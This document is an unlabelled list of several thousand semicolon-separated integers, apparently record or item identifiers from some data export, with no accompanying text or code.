97318;97319;97320;97321;97322;97323;97324;27899;97383;97384;97521;97434;101833;100545;102258;97468;97523;97522;97551;97600;99121;97601;97602;97603;97604;27900;97605;97606;97607;97633;97608;97634;97658;97659;97719;97660;97720;97721;97722;27901;97723;97752;97753;97973;97778;97779;97793;97854;99093;97855;97856;97887;97936;27902;97857;97937;97917;99122;97938;99023;99024;99025;99094;99095;99096;99097;27903;99098;99099;99100;99101;99182;99195;100677;99196;99197;99198;99278;99279;99303;99435;27904;99626;100153;99582;99581;99583;99655;99656;99657;99658;99659;99660;99685;99723;99686;27906;27905;99724;99725;99726;100247;99965;99966;100154;100216;99993;100293;100249;100248;100098;27907;100099;100100;100265;100101;100379;100102;100155;100156;100218;100217;100219;100250;27908;100251;100252;100266;100253;100267;100254;100255;100268;100294;100411;100412;100413;100414;100460;100415;27909;20649;100509;100546;100547;100548;100570;100549;100591;100590;100632;100633;100662;27910;100919;100663;100664;100665;100667;100666;100835;100668;100755;100678;100781;100836;100837;27911;100920;101261;101148;100921;100923;100922;100924;100925;100927;100926;27912;100928;100929;100930;100931;100932;100987;100933;100988;100989;100990;101149;101024;27913;101062;101083;101150;101151;101153;101152;101155;101154;101157;101156;103319;101231;101262;101263;27914;101354;101545;101546;101769;101770;101809;101834;101835;101892;101893;27915;101894;101928;101929;101949;101950;102091;101952;101951;101973;101974;102092;102014;102015;102016;102033;27916;102034;102071;102093;102160;102161;102195;102197;102196;102259;102198;27917;102260;102261;102416;102417;102418;102419;102420;102421;102422;102423;102424;102493;27918;102522;102523;102580;102543;102525;102524;102582;102581;102583;102584;102678;102679;102680;20650;27919;102681;102697;102777;102816;102815;102817;102818;102820;102819;102857;102956;102957;27920;102975;102976;103047;103187;103217;103372;103218;103250;103249;103320;103321;103322;27921;103323;103324;103325;103326;103327;103356;103416;103417;103418;27922;103466;103641;103642;103643;103644;103645;103646;103667;103808;103691;103662;103692;27923;103731;103773;103774;103775;103776;103777;103778;103779;103780;103809;103810;103811;103812;27924;103813;103814;103815;103834;103835;103863;103921;104118;104119;104120;27925;27926;104122;104121;104143;104173;104211;104212;104213;104272;104317;104318;104319;104320;104321;104322;27927;104377;104323;104431;104477;104432;104496;104652;104807;104994;105542;104543;104569;104625;27928;105543;104712;104653;104713;104715;104714;104734;104716;104717;104735;104736;104738;104737;104739;27929;104995;104784;104808;104785;104810;104809;104844;104845;104846;104881;104882;20651;104883;27930;104884;105021;105037;105038;105099;105100;105101;105102;105104;105103;105105;105354;27931;105355;105107;105106;105173;105254;105544;105583;105649;105650;105686;105687;105688;27932;105724;105723;105725;105746;105745;105747;105726;105748;105727;105749;105750;105751;106482;27933;27934;105767;105766;106264;108750;106096;106074;106135;106134;106265;106266;106267;106268;106269;106270;106272;106271;106295;106347;106790;108751;106348;106371;106372;106373;27935;106483;106533;106534;106556;106557;106581;106558;106619;106582;106620;106675;27936;106676;106677;106678;106709;106749;106791;106792;125352;106793;106794;106816;106837;27937;106839;106838;106869;106927;106928;107145;106929;106968;106945;107087;107215;27938;106970;106969;106971;106972;106973;107023;107003;107146;107117;107147;107148;107192;27939;107193;107194;107257;107256;107293;108335;108370;108949;108371;108372;108403;108453;20652;27940;108483;108484;108514;108513;108582;108583;108658;108657;108706;108707;108708;27941;108710;108709;108793;108794;108833;108832;108834;108835;108841;108840;108842;108878;108843;27942;109058;108879;108950;108951;109002;109086;109199;109466;109200;109311;109467;27943;109312;109313;109314;109315;109317;109316;109343;109468;109469;109600;109648;27944;109649;109650;109680;109892;109681;109723;109798;109812;109940;109863;109893;109894;27945;110044;110045;110046;110047;110048;110049;110050;110051;110052;110094;27946;110124;110225;110191;110226;110262;110320;110263;110285;110264;110321;110286;110322;27947;110382;110395;110413;110474;110475;110549;110476;110477;110478;110479;110481;110480;110513;110550;110514;27948;110515;110516;110517;110532;110533;110551;110552;110611;110622;110623;27949;27950;110641;110939;110662;110721;110765;110805;110894;110895;110896;110897;110898;110899;110900;110921;20653;27951;110922;110923;110924;110940;110925;110941;110942;110973;111005;110974;110975;111006;27952;111039;111038;111040;111041;111061;111060;111062;111135;111266;111267;111268;117825;27953;111269;111330;111331;111374;117537;111349;111375;111510;111511;111512;111513;111526;111576;27954;111577;111578;111579;111580;111581;111640;111641;111672;111673;111748;27955;111749;111750;111751;112017;111752;111753;111843;112032;111844;112033;117479;112058;112083;27956;112084;112149;112109;112110;112189;112111;112112;112150;112113;112151;112190;112205;117331;27957;27958;117356;117357;117496;117538;117454;117455;117456;154827;117539;117630;117595;117631;27959;117806;117805;117867;117868;117869;117870;117871;117872;117873;118322;27960;117913;117904;117914;117915;118067;117934;117916;117996;117935;118794;118068;118358;118081;118082;27961;118323;118142;118083;118143;118324;118144;118200;118176;119300;118325;118201;118326;118327;118328;118359;118329;27962;20654;118392;27963;118393;119146;118492;118567;118591;118568;118751;118750;152537;118795;118796;27964;118797;118820;118855;118904;118905;118906;118907;119043;119253;118954;118966;118967;27965;118968;118970;118969;118971;118972;118973;119014;119118;119216;119254;119255;119256;119257;27966;119496;119301;119303;119302;119337;119338;119339;119340;119458;119652;119459;27967;119580;119497;119581;119653;119654;119655;125542;119826;119827;119828;119829;119830;119831;119832;27968;121062;121063;121095;121096;121161;121186;121187;121210;121211;27969;121212;121224;121244;121328;121345;121329;122398;122479;121346;121381;121382;27970;121432;121469;121592;121593;121594;122052;121470;121506;121507;121508;121541;122053;121595;121596;121597;27971;121598;121619;121639;121640;122054;122055;122610;122152;122153;122183;27972;122184;122362;122314;122399;122480;122481;122482;122499;122500;27973;20655;27974;27975;122533;122646;122647;122667;122668;122669;122716;122811;122812;122813;122868;27976;122892;122893;122946;123001;136604;123074;124152;123075;123076;123077;123078;123127;123502;124114;27977;123414;124271;123503;123457;123555;123504;123505;123641;27978;123675;27979;123676;123677;123678;123679;123680;123681;123682;123750;123751;123786;124272;123787;123930;123931;27980;123932;123933;123934;123973;123999;124019;124085;124115;124116;27981;124191;124273;124274;124297;124275;124322;124323;124758;125386;124407;125765;124408;27982;124457;124561;124458;124587;124676;124677;124678;124679;125593;124696;124759;27983;124717;124718;125025;125026;125027;125028;125134;125135;125474;125475;125136;126095;125353;125137;125138;27985;27984;65106;27986;125139;125140;125141;125142;125143;125144;125145;125215;125251;125252;125253;125337;27987;125338;125339;125766;125948;125354;125355;125476;125543;125544;125594;125545;125621;20656;125622;20657;27988;125623;125624;125625;125704;125705;125720;125721;125722;125723;125724;125725;125726;125767;125768;125769;27989;125770;125771;125772;125811;125812;125813;125851;125853;125852;125854;125998;126064;126065;27990;126066;126067;126096;126068;126097;126098;126099;27991;126174;126241;126242;126255;126254;126257;126256;126503;126305;27992;126306;126374;126375;126464;126445;126465;126504;126564;126563;127791;126565;27993;126566;126567;126568;126598;126698;126745;127093;126746;126747;126748;126749;27994;126772;126773;126774;126815;126816;126817;126818;126947;126948;126949;126950;27995;127792;127041;127886;127042;127887;127094;127043;127095;127096;127793;127097;127794;127795;27996;127796;127798;127797;127799;127800;127801;127802;127803;127804;27997;127805;127806;127839;127840;127888;127890;127889;127891;127892;128023;128024;20658;27998;27999;128025;128026;128027;128028;128029;128031;128030;128050;128049;128076;128075;28000;128320;128321;128322;128323;128412;128993;128474;128680;128475;128476;128477;128505;128478;28001;128506;128681;128507;128521;128545;128614;128629;128630;128682;128631;128754;129048;28002;128755;128756;128874;128967;128875;129289;134888;129049;129050;129290;129351;129384;28003;129385;129466;129488;129489;129490;129556;129491;129712;129677;28004;129749;129775;129774;129808;129882;129967;130146;129968;130003;130052;130147;130148;28005;28006;130149;130150;130151;130152;130167;130200;130585;130362;130392;130393;130394;28007;28008;28009;130395;130427;130513;130396;130586;134657;142870;130428;130429;130587;130588;130622;130623;130756;130757;28010;130961;131694;130962;130963;131011;130964;131012;131013;130965;130966;131014;131313;131015;131016;28011;131017;131072;131074;131073;131161;131182;131162;131225;131226;131314;28012;20659;131315;132011;131392;131559;131560;131561;131695;131696;131562;28013;131563;131564;131565;131722;131723;132012;131761;131923;131924;132013;132014;28014;132015;132095;132016;132310;132240;132689;133142;132690;132691;28015;132692;132746;132747;132768;132748;133224;132854;132929;132930;132931;132932;132933;132953;28016;133039;28017;133040;133143;133178;133144;133179;133204;133205;133206;133207;133225;28018;133289;133548;133290;133292;133291;133350;133293;133294;133351;133352;133353;133354;133355;28019;133356;133398;133449;133450;133496;133497;133521;133522;133523;28020;133549;133524;133550;133551;133646;133647;133648;133649;133715;133764;133840;28021;28022;133793;133794;133795;133796;133798;133797;133799;133800;133950;133951;134037;28023;134038;134039;134298;134299;134300;134301;134367;134402;20660;134442;28024;134658;134659;134660;134661;134662;134663;134664;134699;134758;134856;28025;135026;135027;135028;135029;135170;135171;135229;135269;135270;28026;28027;135271;135282;135283;135284;135285;135286;135398;135399;135455;135581;28028;135672;136398;135846;135847;136027;135894;136281;135895;135966;135896;135967;135968;151919;136083;136028;28029;136029;136084;136171;136085;136086;136087;136088;136089;136173;136172;28030;136282;136400;136399;136401;136420;136545;136493;136546;136605;136606;136607;28031;136608;28032;136663;136692;136964;136708;136709;136710;136711;136730;136731;136732;136965;136733;136759;136966;28033;136801;136802;136803;136894;136943;136944;136967;137043;137044;137045;28034;137046;137133;137178;143270;137179;137232;137295;137352;137296;137298;137297;28035;137299;28036;137300;137301;137353;137553;137554;137555;137556;20661;137625;28037;137744;137824;137745;137825;137848;137872;137849;137891;138132;138133;138134;28038;138135;138136;138137;138138;138139;138165;138166;138167;138168;138325;28039;138208;138326;138497;138498;138552;138834;138835;138836;138872;138873;28040;138874;138997;138875;139179;139365;138998;138999;139023;139024;139180;139025;139026;139027;28041;139181;139028;139366;139182;139311;139312;139313;140028;139367;139368;28042;139369;139371;139370;139372;139373;139480;139479;139567;139568;139596;139659;28043;139660;139662;139661;139692;139693;139724;147981;139725;139770;139782;28044;139783;140176;139784;139848;139908;140029;140265;140030;140031;140177;28045;140178;140179;140180;140182;140181;140184;140183;140266;140267;28046;140450;140451;140458;140589;140590;140591;140593;140600;140592;20662;140603;140601;28047;140604;140647;140646;140645;140639;140641;140644;140642;28048;140640;140637;140648;140638;140643;140650;140652;140649;140651;140659;28049;140701;140717;140720;140719;140723;140722;140730;140724;28050;140729;28051;140751;140753;140736;140755;140752;140754;140786;140784;140788;28052;140787;140801;140802;140803;140800;140925;141482;140929;140920;140924;140922;28053;140923;140919;140921;141825;142027;140928;140927;141092;141054;141109;141112;28054;141111;148334;141097;141095;141922;141110;148842;141180;141182;141178;141183;141179;141181;28055;141177;141206;141176;141302;141301;141450;141451;141449;141448;141447;28056;141459;141936;141483;141537;141542;141543;141545;141479;141538;28057;28058;141539;141541;141544;141615;141620;141621;141824;141862;141821;141863;141923;142502;20663;28059;28060;141822;141934;141820;141913;141921;141932;141937;142367;142001;142865;142017;142026;28061;142055;142368;142218;142369;142370;142371;142464;142499;142501;142498;28062;142735;142500;142729;142732;142730;142727;142731;142721;142741;149521;142736;28063;142739;142866;142969;142968;142966;142967;142998;143121;143127;143120;143119;28064;143214;143215;143206;143242;143249;143264;143266;143271;143267;143269;144890;143268;28065;143376;143374;143375;143373;145013;143428;143430;143432;143433;143431;144111;143429;144110;28066;143445;144112;143476;143587;143585;143584;144011;144012;144078;144013;144015;144016;144709;144066;28067;144300;144299;144704;144337;144710;144745;144747;144746;144751;144750;28068;144749;144752;144789;144786;144785;144788;144808;144787;144849;144897;144869;145228;145234;28069;28070;144870;144943;144944;145011;145007;145046;145047;145048;145078;147987;145084;20664;28071;145081;145221;145409;145410;145464;145463;145517;145514;145510;145516;28072;145518;145511;145512;145515;146349;145542;146043;146069;146044;146306;146066;146070;28073;146068;146208;146209;146301;146302;146303;146348;146351;146350;146375;28074;146385;146384;146435;146436;147988;146437;146494;146538;148006;148011;147979;28075;147996;147976;147999;147980;147986;147990;147977;147975;147983;28076;148009;147978;148005;147982;147991;147997;147995;148008;148000;147994;147984;148004;147993;28077;148007;148010;147985;147998;147989;28078;28079;28080;20665;28081;28082;28083;28084;28085;28086;28088;28087;148001;147992;147974;148003;28089;148002;147968;147970;147973;147972;147969;147971;148089;148034;28091;28090;148108;148130;149032;148135;148891;148218;148244;148248;148260;148279;28092;148295;148335;148498;148495;148491;148493;148497;28093;148492;148496;148494;148555;149044;148554;148689;148691;20666;148690;148819;149244;148810;28094;148856;148859;148991;148855;148938;148953;148992;148987;149055;149092;28095;149093;149251;149474;149252;149253;149323;149306;149322;149332;150325;149324;149419;28096;149417;149418;149409;149408;149405;148911;149416;149661;149410;149415;149407;149411;28097;149406;149404;149446;149478;149477;149519;149520;149527;149651;149649;149650;152134;28098;28099;149742;149727;149834;149818;149906;149907;149908;149903;149905;149991;150029;149988;150712;150030;150028;150324;28100;150130;150131;150492;150129;150132;153852;150134;150144;150320;150143;150151;150152;28101;150155;150164;150232;150233;150234;150394;150292;150420;150436;150691;150690;150692;150809;150793;150846;28102;150857;150858;150939;150867;150942;150949;151017;150947;150948;150953;153127;151000;150954;20667;20668;28103;150957;153131;150955;150956;150940;150952;150995;151444;151443;151583;151451;151452;151679;156562;28104;28105;151800;151680;151836;151830;151835;153130;151921;151907;153129;151837;151920;28106;151924;152002;156918;152555;152081;152079;153942;152135;152136;152144;152145;152178;152143;152229;152180;152181;28107;152230;157372;152216;152235;152362;152363;152417;152420;152416;152508;152830;152539;152536;28108;152632;152637;156633;152640;152639;152681;152665;152702;28109;152774;152784;152868;152870;152846;152869;152917;152913;152918;152916;28110;152953;152954;152957;153138;153134;153143;157224;153145;153139;153361;153144;153137;153142;153156;28111;153174;153178;153445;153526;153179;153177;153476;153527;153183;153211;153243;153367;153366;153391;153408;154053;153407;153406;153511;153510;28112;153447;153514;153446;153449;153448;153508;153573;153568;153569;153593;153591;153592;28113;153768;153766;153785;153781;153801;153769;154162;153770;154205;153799;153779;153802;153797;153788;153851;153789;153856;153853;20669;28114;153854;153855;153857;153866;153888;153910;153908;153925;153959;154203;28115;28116;154204;154227;154242;154241;154273;154279;154278;154352;154274;28117;154328;154337;154338;154405;154779;154431;154415;154414;154413;154569;154704;154709;154778;28118;154783;156561;154883;154903;154977;154974;154972;155222;154980;155221;155162;28119;155232;155220;155297;155892;156041;155296;155295;155351;155308;155375;155374;28120;155602;155655;155637;155672;155681;155687;155722;155727;155729;28121;155751;155752;155749;155747;155768;155750;155767;155766;155923;28122;155908;155943;155935;155944;155936;156043;155938;155939;28123;155925;155952;155970;156203;156040;156042;28124;156055;156161;156054;156076;157139;156105;156104;156122;156168;20670;28125;156171;156155;156190;156472;156485;156482;156486;156484;28126;156481;156483;156544;156568;156543;156612;156613;156608;28127;156712;156645;156743;156650;156711;156742;156744;156772;28128;156801;156853;156804;156802;28129;156880;156915;156879;156917;156934;156914;157143;156962;156960;156961;28130;157057;157059;157112;157085;157160;157162;157243;157299;28131;157286;157287;157357;157349;157371;157350;157351;157458;157353;158125;157352;157355;157404;28132;157370;157356;157457;157456;157843;157463;157882;28133;158072;158053;28134;158212;158134;158135;158160;158162;158258;158255;158159;158161;158256;158253;158249;158254;20671;28135;158273;158572;158679;158259;158271;158272;158454;158455;158456;158250;158457;158458;28136;28137;158502;158680;158574;158573;158683;158646;158688;158731;158737;158453;28138;158789;158817;159022;158866;158901;158902;158905;158939;158941;158940;158937;158932;28139;158938;158987;159059;159020;159024;159058;159026;159107;159142;158728;159144;28140;159143;159137;159138;28141;28142;28143;159160;28144;28145;28146;20672;28208;28209;28210;28249;28251;28250;28288;28357;28358;29236;28359;28360;28372;20673;29213;29214;29304;29696;29237;29215;29238;29239;29305;29738;29739;29740;20674;29793;29892;29917;29918;29919;29920;29922;29921;29964;29978;29979;30018;30019;30042;30043;20675;30147;30183;30252;30184;31092;31164;20676;31093;31165;31166;31341;65107;31405;31461;31603;31406;31625;31638;31783;31639;20677;31677;31678;31700;31702;31703;31701;31704;31784;31848;31785;20678;31966;31967;20679;32053;32028;32029;32185;32186;32054;32187;32189;32188;32190;20680;32191;32192;32193;33197;65108;33254;65109;32357;32359;32358;32360;32431;32430;33198;32432;33093;33199;33217;33388;33124;33255;20681;33436;33389;33464;33544;33390;33504;33531;45473;33758;33560;33827;33575;20682;33759;33760;33587;33808;33807;33809;33940;33941;34059;34048;34080;20683;34094;34116;36904;37738;37936;65110;36243;38073;38000;37910;36953;36855;20684;36256;37333;37068;38049;36805;37662;37836;37944;36491;36681;20685;20686;38023;37570;37161;37499;38095;37631;38074;37538;36711;36364;20687;37649;37886;37299;36499;37887;36916;37203;37355;37177;36611;37546;36899;37965;37045;37683;20688;37853;36745;37207;37977;38099;36652;36927;37422;36374;36896;20689;36262;36225;65111;36984;37474;36761;37984;37654;36815;36657;36674;37447;37968;20690;37828;20691;37888;37746;37974;65112;37362;37162;37876;36382;36220;36714;38132;20692;36397;37469;37842;38044;37381;36454;38011;36279;37217;65113;65114;36218;20693;37002;38070;36720;36665;36786;37810;37148;38131;36478;37740;65115;65116;38036;37504;20694;37042;36589;36749;38037;36746;37364;37956;38092;36361;37607;20695;20696;37463;37220;37359;36471;37935;37983;38148;36537;36366;37606;36907;37337;36418;37152;37498;37819;20697;37389;36530;36635;37438;20698;37978;37849;38194;37762;37806;36228;38205;38195;38647;38196;38685;20699;38686;38715;38714;38716;38741;38758;38759;39362;38777;38848;38984;20700;39390;20701;39312;39311;39313;39336;39337;39533;39353;39363;39371;39419;39491;39515;20702;39516;39517;39518;39534;39586;39600;39601;39619;39620;40348;20703;39786;20704;39787;39788;39789;40655;39800;39851;44326;40361;40329;40417;40416;20705;40656;40490;40491;65117;40492;40528;40529;40531;40547;40576;40590;40751;40530;40657;20706;40658;40752;40767;40943;65118;40768;40769;40794;40848;40906;40944;20707;20708;40981;41006;40982;41013;41046;41045;41606;41624;41940;20709;41969;41968;42043;42051;42050;42079;42080;42081;42082;42093;42167;42146;20710;42237;42207;42344;42208;42209;42474;42407;42335;42408;42466;42467;42817;42795;20711;42858;42891;43001;43026;42930;43058;43087;43059;65119;20712;43097;43108;43109;43110;43153;43366;43368;43367;43622;43823;43824;65120;20713;43825;43874;65121;43897;43898;44039;44057;44058;44106;44107;20714;44108;44115;44133;44323;44669;45549;44327;44336;44335;44655;44399;44656;44586;44585;44594;20715;20716;44641;44640;44688;44912;44913;44985;44936;45016;45037;45038;45042;45079;45080;45081;20717;45108;65122;45342;45377;45343;20718;45484;45483;45398;65123;45475;45476;45474;45485;45486;45487;47159;47160;47822;47823;45550;47821;45551;45589;20719;47162;47161;47574;47824;47825;47855;46014;45575;45576;46179;46192;46254;46336;46253;46672;20720;46688;47799;46691;46700;47618;46731;65124;46752;46810;46811;46812;46836;46855;20721;47035;47108;47109;65125;47110;47111;47575;47826;47856;47857;50342;47679;20722;47695;47734;47778;47742;47858;48282;48242;48283;48253;48261;48262;48315;20723;48361;48349;48362;48381;48904;49268;49169;48757;48758;49170;48905;49269;20724;49065;49066;49102;49140;49171;49141;49303;49304;49305;49236;49283;20725;49306;20726;49644;49643;49673;49761;49762;49763;49764;50082;49765;49772;50083;11140;50302;25345;149495;14363;23651;149496;71954;10542;19289;25821;35608;61517;61516;106379;55049;71883;87869;57574;55048;106380;87870;106381;87871;106382;106383;106384;87872;10289;57891;35309;59642;42843;51574;42844;99982;22869;152742;152743;11154;152741;33851;20161;52633;79235;18586;12115;12285;11228;46882;12297;64485;152357;72582;57641;33850;108797;92321;11671;12198;23966;19497;19498;19499;92322;18260;19698;11359;10291;11746;35707;94046;35708;35710;35709;94048;94047;35711;94049;10829;35712;35713;11765;11699;15967;77704;77705;77706;52670;11280;12272;10645;24341;16272;19938;77703;10292;10374;104124;60109;141118;136949;104125;104660;104659;136950;54614;19760;20992;139457;136613;11981;17211;17282;47862;16455;16203;70764;14785;130168;14792;14833;16280;20133;12004;82704;69101;76388;78889;82705;82706;11471;19717;82707;19757;55022;24734;19427;20175;18551;34820;16232;16230;101294;146990;52504;91126;100272;94671;104888;100273;101301;101295;94672;20148;20181;20182;19397;25420;31861;31862;33900;55983;56238;91127;17226;56239;31419;31409;10293;22078;22077;25990;12094;64292;64293;38889;16140;38890;10294;16062;14823;11472;32381;42347;45406;42348;11526;14847;11107;11749;20968;18494;40549;33819;62798;62100;68984;62901;76536;83729;86567;72007;72008;72985;88051;88052;90680;92458;92459;86568;96609;99200;99509;101818;103930;94168;109682;111208;118204;106104;124167;130056;135586;148897;63646;42831;121247;40548;132962;145222;156846;126778;138527;151942;78549;141784;154246;92788;92789;69044;69045;10295;69043;158459;65701;46332;158460;54644;11679;20993;20346;80083;80084;80082;150989;10744;82531;82532;106719;82533;31642;31853;33278;33485;34400;34730;106720;35068;40466;41626;48760;55024;55608;138341;63137;48906;50650;51772;51851;52976;53405;58416;138899;60049;63381;66216;69015;138900;72279;70560;137358;137357;78626;137753;137397;138342;138343;100592;105294;112216;136896;146102;111518;136999;136895;126246;128080;136422;69016;31852;69017;69018;20066;122534;40370;40372;40373;40374;40375;40376;40377;40379;40378;40380;40381;52010;40382;40383;40385;40384;40386;40387;42178;40388;40389;89112;40390;40391;40392;89113;89114;40393;52011;89115;89116;42179;42289;42870;89117;89118;52012;89735;43826;45386;89736;44642;44993;89737;45402;89738;89739;56246;89740;46765;52013;47150;49085;52014;89741;49703;89742;50611;50858;89743;50985;89744;51077;89745;99166;51422;89673;89674;51971;52582;89675;53592;89676;89677;53840;89678;54968;89679;55747;56508;89680;56665;89681;89105;57749;58362;58302;58535;89106;89107;58744;89108;58903;89109;89035;58977;89036;59506;89037;59966;89038;61747;62944;89039;63332;64642;64643;64812;65735;66723;69193;69550;70527;71214;71245;71617;72006;87673;87674;72958;73469;87675;87676;73851;87677;74244;87678;74465;87679;77630;87680;78025;79762;87681;86254;81079;87889;88954;88906;92949;96084;93512;99102;103357;96338;105410;105584;105768;110901;110902;111350;118360;118955;123556;124192;125146;126699;127807;128994;129161;130346;131018;132017;136174;137047;137354;139849;137826;143166;141757;31727;106585;106584;118091;57397;140044;140043;151128;140045;151130;151129;134217;133843;133844;152047;70448;136746;20094;44646;121350;89661;89662;89663;89664;89665;89666;89667;89668;89669;89670;89671;121351;121352;59447;56997;70877;70878;70879;81083;76368;86945;87940;70880;70881;70882;70883;70884;70885;70886;70887;71773;72037;81084;76203;80037;79862;86946;87941;70888;71774;83781;73917;74470;78108;81085;86947;87942;99129;103375;87943;99130;102698;99131;103376;105614;134876;105486;105782;134877;134878;111759;118466;118885;123518;124300;125218;128035;129493;129497;138475;108711;146827;151665;158494;140039;143221;145090;132856;129825;152411;152675;152672;152225;130004;130153;156560;76945;134216;82741;94053;99708;122976;111386;111601;132753;76964;76966;84150;84804;99709;104852;110295;105787;110294;111602;140772;129498;143450;141803;157129;73895;73896;76944;44645;45414;57399;57398;63113;63112;31729;32503;33105;34156;34818;36117;57400;42308;51057;45541;54996;77963;77962;78826;95260;78670;78671;87762;87763;63075;63074;77332;84219;84220;31728;72038;72039;71052;73671;76453;84221;74264;81184;87925;92944;95287;97989;111975;59091;59729;63076;73672;76454;81185;58793;71231;74265;84805;87926;91226;71051;92945;95288;97990;105555;105783;110098;111978;20301;20729;26200;57395;105788;111220;125884;133208;151012;151285;153547;153544;153545;153546;105793;84340;66897;76426;66896;82899;76947;79147;76946;63062;146825;150163;153889;63061;84341;154017;156035;82708;76360;82710;78669;82709;76495;145402;67141;78508;79863;99474;102084;105514;76994;56957;66908;63060;56958;76356;77727;66909;79864;83184;47897;66812;65209;65223;66274;66806;70612;76457;77728;79865;81146;83186;86124;86125;86255;87592;90710;91322;91713;92870;95468;103377;99475;104654;105784;106950;111760;112207;129503;135411;150982;140040;149902;146826;155790;72119;90711;91828;91829;63681;64920;63684;63682;63683;63685;33106;59372;40907;90763;93191;106621;149786;90351;90764;90352;92841;93051;119015;135923;119016;105789;92842;134163;119834;152873;148255;91339;105794;95441;156932;105790;91340;81315;100717;105586;112208;119304;105795;78024;78771;91457;119037;119038;112209;57396;143574;152534;152872;156361;78857;82742;25119;26201;72040;73673;76455;84222;72041;71054;143554;74266;81186;87927;92946;95289;97940;99104;100417;103379;111757;111976;118464;134626;59092;59730;63077;71053;73674;76456;81187;84223;93521;97834;58794;74267;64921;84806;87928;91227;118980;118883;119098;123516;125883;124298;129495;130453;131129;132417;134627;134973;137663;137077;143223;144852;150961;149853;157422;157130;92947;95290;97941;158148;99105;100418;99590;103380;104853;105791;105487;110099;105785;111979;111761;123002;118467;125224;127138;140773;26911;10342;10758;26925;61708;104885;19288;66174;65792;30150;11786;19229;11165;10463;11397;52704;52703;55523;64558;64559;73595;76355;95657;11731;52656;20317;30108;50829;39328;50971;21336;51060;10650;110557;152701;84399;155732;154458;11185;11184;69864;127108;50514;15520;50513;10296;15910;20061;15437;19474;21739;15402;14230;62735;62736;41058;65188;62737;16270;60061;60062;60063;10610;74262;74220;74221;74218;74216;74219;69370;105732;60017;105733;60018;103050;48264;12006;72771;83346;55640;103051;39471;11470;52003;50504;43111;121479;108807;12224;47863;57640;44670;43067;10470;10297;22257;11771;22306;21311;10816;24864;18292;18287;14365;18288;40773;11515;11516;20250;18572;18571;11794;19502;21566;24780;14186;17142;10298;18122;11095;11315;10505;24004;11424;10526;38808;22309;25681;10299;10592;11639;33859;22047;69275;69274;58620;81787;10475;69321;11668;10300;81702;58411;19590;58412;20014;15787;18478;12005;22206;32124;17732;17733;17734;87011;90709;92606;94511;105484;96803;11486;11628;11627;17735;17736;17737;17738;17739;17740;124338;17741;57040;17742;17743;109429;111665;126262;43352;56979;10697;11606;34781;33932;14722;44316;44315;10698;35374;47898;17771;52756;109553;10757;14382;108534;108535;108536;108537;108539;108538;108540;21785;22300;108542;108541;108543;108544;108545;108547;108546;108548;108549;108550;108552;108551;108553;108554;117602;77707;108555;108556;108557;108558;108560;108559;108561;108562;108563;146497;127911;146488;128280;146498;146495;146531;146496;20343;11279;67257;49704;49705;11732;62183;62184;10367;12074;10662;19781;31865;11089;10301;18177;73758;69516;42292;70119;69517;73520;83739;83740;83742;83741;29306;73759;11151;83743;20108;29871;10302;10557;17368;63135;10303;20839;24235;10476;10304;25087;25088;141853;141562;92724;94582;142142;142224;142138;141561;141852;141564;141563;141920;141918;141914;142141;142060;141850;141565;141916;141851;141919;136410;139065;138091;138878;140453;142059;139871;141469;140791;145069;146451;145535;146860;146859;148850;149787;152191;153587;45415;45416;45417;45419;45418;36132;34501;38978;44588;49690;45429;45423;45422;33127;34219;35659;36161;39450;41057;56683;45430;49691;51510;53475;55649;57607;58594;62394;70022;45420;142140;45421;141917;141566;140462;140463;141915;140464;142139;136897;136892;35082;47112;50561;52615;55169;56229;58595;59728;62413;64097;68982;36133;72061;76967;78604;81825;40823;42821;45431;56348;81401;58596;59505;64380;61459;66374;69449;72062;76995;66375;62975;69021;71229;96178;100221;77438;74235;83290;80398;86018;84639;90316;94512;97355;97858;106843;108759;158561;133529;11162;86019;100123;102199;102200;102201;133270;133271;119678;124566;125595;119679;135771;136180;136183;133272;133273;135720;126052;119680;133274;136426;124023;141497;124024;124025;141498;133275;141472;141468;125630;132076;131733;129097;133360;133696;135180;135702;137398;137368;141473;57034;57826;87171;18047;23638;157866;158562;92725;128065;57709;62943;63098;63099;62120;73103;99906;57710;31411;124567;125896;132341;133357;133402;137633;137658;139326;139237;139238;140187;139227;139730;57708;108485;83288;83491;93049;96663;141344;141343;101838;141345;141347;141349;105082;129168;141348;108883;108486;141342;141346;123510;99907;78739;78740;74155;79691;102175;73385;74156;77533;78741;82850;84571;93075;93076;93026;102176;77534;79216;78742;156724;83872;93027;91916;106395;106396;73382;73383;73386;73384;73206;73207;73208;73499;72903;72645;73209;74293;77535;72646;77536;74157;74158;74159;77537;74160;74161;74162;74163;79217;77538;77539;77540;78743;78744;78745;78746;82851;84572;84573;83873;86997;87775;94200;99236;100222;128995;105587;108487;108488;107260;128996;128999;129000;129001;117937;129002;128997;129003;128998;61488;63097;77541;82029;83055;89689;102996;103568;72644;77542;17337;80855;70070;80856;71466;80857;80858;80859;134308;23639;70069;23649;11181;102586;27803;16173;11010;10616;11692;76777;76778;76598;76597;21749;19946;16277;11584;11333;11542;20375;11533;62966;64244;62202;11688;10305;10487;12083;10466;24671;38734;16070;10306;63280;140578;11274;21729;51988;12019;96533;96534;108811;10307;20826;20973;21733;21738;22921;25770;25956;27040;29998;33820;35788;38858;43181;47717;50379;50846;51091;56681;57363;59756;67207;71787;11530;19217;15817;16199;15952;16152;16204;30187;30186;30185;10365;158243;112194;131317;147420;12054;70613;70614;70615;131835;70616;70617;70618;80887;70619;70620;74442;70621;70622;70623;70624;70626;70627;70625;70628;70629;66420;46016;141782;70630;141783;62516;152102;62517;77668;70329;70330;63620;10940;139239;151482;20097;38652;48214;47698;48215;49068;53373;54956;55652;62976;70331;10309;21674;54955;22022;23732;25879;10310;10311;21223;20227;11847;11430;11429;10312;10313;10314;28182;25684;20393;20391;24277;20392;22072;31641;122448;54629;54585;15912;15970;40564;10315;10316;72388;72389;73613;122422;76167;78078;21737;26027;106629;11884;23648;72387;34335;17362;78675;34217;34218;11559;34113;78673;35629;36127;41029;69105;77731;79251;70762;69881;71521;72942;73864;76150;76992;77732;89103;90786;91820;79252;92816;80459;81672;83488;84398;85405;86480;87824;40335;48213;55510;48943;40999;43350;44338;46864;49978;57538;56689;58517;59239;60116;61571;50678;51458;53473;52502;55411;56163;54942;61572;62477;63095;65253;64361;66543;66894;56164;57539;58518;56690;59240;60117;60118;70763;69880;71520;72941;61573;63096;62478;64362;66544;65254;66895;69104;87825;103984;102919;89104;90787;91821;93518;92817;93940;103985;95435;97574;96765;99437;100671;101898;102920;102921;119419;118206;121107;129301;124164;125365;126923;103986;105007;106142;107093;108885;126921;110269;129061;131950;134114;111387;140777;136922;117339;119420;118207;121108;124165;129299;125367;124166;136926;140775;126919;129059;125369;131948;133212;